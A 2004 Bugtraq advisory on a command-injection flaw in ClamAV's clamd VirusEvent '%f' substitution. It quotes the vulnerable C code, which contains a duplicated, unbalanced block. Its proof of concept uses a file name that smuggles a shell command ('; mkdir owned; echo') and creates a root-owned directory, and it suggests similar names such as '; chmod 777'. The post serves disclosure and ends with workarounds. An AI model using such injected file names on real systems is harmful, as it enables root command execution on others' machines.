[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    clamd - NEVER use "%f" in your "VirusEvent"
From:       Rene <l0om () excluded ! org>
Date:       2004-03-30 12:34:18
Message-ID: 20040330123418.12944.qmail () search ! securityfocus ! com
[Download RAW message or body]



date: 30 March 2004
product: clam antivirus
author: l0om  -  l0om[at]excluded.org  -  www.excluded.org

#####################################################################
clam antivirus is a antivirus program (which works very well). it comes with a lot of \
features and its easy to handle. for normal you start it from the command line on \
demand but if you use the the dazuko module you can also scan in realtime. the \
program runs  on standard as root but you can drop its privileges if you want to.

in the clamav.conf we can find the "VirusEvent" direction (which is on default \
disabled):


# Execute a command when virus is found. In the command string %v and %f will
# be replaced by the virus name and the infected file name respectively.
#
# SECURITY WARNING: Make sure the virus event command cannot be exploited,
#                   eg. by using some special file name when %f is used.
#                   Always use a full path to the command.
#                   Never delete/move files with this directive !
# VirusEvent /usr/bin/send_sms 1214131 "VIRUS DETECTED: %f: %v"

"Make sure the virus event command cannot be exploited,
eg. by using some special file name when %f is used."
 
this is not enough. they should del this "%f" feature for security reasons because in \
my opinion, for now, you nearly cant prevent the "%f" thing from breaking out of your \
VirusEvent and do whatever the attacker likes too.

#####################################################################
void virusaction(const char *filename, const char *virname, const struct cfgstruct \
*copt) {
 [...]
    buffer = (char *) mcalloc(strlen(cmd) + strlen(filename) + strlen(virname) + 10, \
sizeof(char));

    if((pt = strstr(cmd, "%f"))) {
        *pt = 0; pt += 2;
        strcpy(buffer, cmd);            <----
        strcat(buffer, filename);       <----
    if((pt = strstr(cmd, "%f"))) {
        *pt = 0; pt += 2;
        strcpy(buffer, cmd);            <----
        strcat(buffer, filename);       <----
        strcat(buffer, pt);             <----
        free(cmd);
        cmd = strdup(buffer);
    }

    if((pt = strstr(cmd, "%v"))) {
        *pt = 0; pt += 2;
        strcpy(buffer, cmd);
        strcat(buffer, virname);
        strcat(buffer, pt);
        free(cmd);
        cmd = strdup(buffer);
    }

    free(buffer);

    /* WARNING: this is uninterruptable ! */
    system(cmd);   <------------------------------------------
    free(cmd);
}
#####################################################################

as we can see in the source code there is no filter for shell characters like ";" or \
" in the program. therefor an attacker may take a look at your VirusEvent(as your \
clamav.conf is world-readable) and create a file named  " ; chmod 777 etc" for \
example and put some virus in it. as we can see above the clamd will execute the \
buffer. The attacker cant use pathes like "/" but he has what it takes to get root or \
kill the system.

the commands will be executed by the clamd on "/" as the process makes a chdir("/").

#####################################################################
example:

l0om:~> ls -l /usr/local/etc/clamav.conf
-rw-r--r--    1 root     root         6863 2004-03-27 11:27 \
/usr/local/etc/clamav.conf

l0om:~> cat /usr/local/etc/clamav.conf
[...]
# Execute a command when virus is found. In the command string %v and %f will
# be replaced by the virus name and the infected file name respectively.
#
# SECURITY WARNING: Make sure the virus event command cannot be exploited,
#                   eg. by using some special file name when %f is used.
#                   Always use a full path to the command.
#                   Never delete/move files with this directive !
VirusEvent /bin/echo "Virus: %f: %v" | /usr/bin/mail -s "VIRUS ALERT" \
admin@network.net

# Run as selected user (clamd must be started by root).
# By default it doesn't drop privileges.
#User clamav
[...]

l0om:~> cat >" \"; mkdir owned; echo \""
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

l0om:~> ls
 "; mkdir owned; echo "  XXX.blow_balls_4_real.mpeg   \
XxX.admin_and_amanda_backup_deamon_having_fun.avi

# on realtime scanning the file will be scaned when we close it or we open it for \
reading. # [...whatever- on next virus scan]

l0om:~> ls -ld /owned
drwxrwxrwx    2 root     root           48 2004-03-30 11:29 owned
#####################################################################

workaround:
- dont use the VirusEvent
- dont use the "%f" in the VirusEvent(!)
- start events with your own script parsing the clamd´s log file manual
######################################################################

have phun everybody!
   someone on NoFX concert or on the deconstruction-tour in köln?  PARTY ON!

-- l0om
-- www.excluded.org


[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic